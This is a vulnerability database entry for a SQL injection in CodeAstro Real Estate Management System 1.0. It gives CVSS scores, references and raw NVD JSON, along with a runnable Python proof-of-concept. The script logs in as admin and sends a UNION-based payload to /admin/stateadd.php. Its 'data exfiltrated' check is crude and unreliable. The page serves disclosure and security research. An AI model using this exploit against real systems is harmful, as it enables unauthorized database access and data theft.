CVE-2025-14899

Description

A weakness has been identified in CodeAstro Real Estate Management System 1.0. This impacts an unknown function of the file /admin/stateadd.php of the component Administrator Endpoint. This manipulation causes sql injection. The attack may be initiated remotely. The exploit has been made available to the public and could be used for attacks.

CVSS Details

CVSS Score

4.7

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:codeastro:real_estate_management_system:1.0:*:*:*:*:*:*:* - VULNERABLE

CodeAstro Real Estate Management System 1.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-14899 SQL Injection PoC
# Target: CodeAstro Real Estate Management System 1.0
# Endpoint: /admin/stateadd.php
# Vector: SQL Injection via state parameter

import requests
import sys

target = "http://target.com"
login_url = f"{target}/admin/index.php"
inject_url = f"{target}/admin/stateadd.php"

# Admin credentials (required for exploitation)
admin_creds = {
    "username": "admin",
    "password": "admin123"
}

def exploit_sqli():
    """SQL Injection exploitation using UNION-based injection"""
    
    # Step 1: Login as admin
    session = requests.Session()
    login_resp = session.post(login_url, data=admin_creds)
    
    if "login" in login_resp.url.lower():
        print("[-] Login failed!")
        return None
    
    print("[+] Login successful!")
    
    # Step 2: SQL Injection payload - extract database version
    # Using UNION-based injection to extract database information
    sqli_payload = "1' UNION SELECT NULL,version(),user(),database()-- -"
    
    data = {
        "state": sqli_payload,
        "submit": "Submit"
    }
    
    try:
        resp = session.post(inject_url, data=data, timeout=10)
        
        if resp.status_code == 200:
            print("[+] Payload sent successfully!")
            print(f"[*] Response length: {len(resp.text)}")
            
            # Check for SQL error or data leakage
            if "5." in resp.text or "MariaDB" in resp.text or "MySQL" in resp.text:
                print("[!] SQL injection confirmed - data exfiltrated!")
                
    except requests.exceptions.RequestException as e:
        print(f"[-] Request failed: {e}")
        
    return session

if __name__ == "__main__":
    print("[*] CVE-2025-14899 SQL Injection PoC")
    print("[*] Target: CodeAstro Real Estate Management System")
    exploit_sqli()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-14899
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-14899
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-14899/
[4] VulDB https://vuldb.com/cve/CVE-2025-14899
[5] https://codeastro.com/
[6] https://github.com/YZS17/CVE/blob/main/CodeAstro_Real_Estate_Management_System/stateadd.php-sqli.md
[7] https://vuldb.com/?ctiid.337424
[8] https://vuldb.com/?id.337424
[9] https://vuldb.com/?submit.715671

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-14899", "sourceIdentifier": "[email protected]", "published": "2025-12-19T01:16:05.670", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "A weakness has been identified in CodeAstro Real Estate Management System 1.0. This impacts an unknown function of the file /admin/stateadd.php of the component Administrator Endpoint. This manipulation causes sql injection. The attack may be initiated remotely. The exploit has been made available to the public and could be used for attacks."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.0, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L", "baseScore": 4.7, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.2, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:M/C:P/I:P/A:P", "baseScore": 5.8, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "MULTIPLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 6.4, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:codeastro:real_estate_management_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "64EAEAD6-B0EE-4039-B827-3C243E2058F4"}]}]}], "references": [{"url": "https://codeastro.com/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/YZS17/CVE/blob/main/CodeAstro_Real_Estate_Management_System/stateadd.php-sqli.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.337424", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.337424", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.715671", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}]}}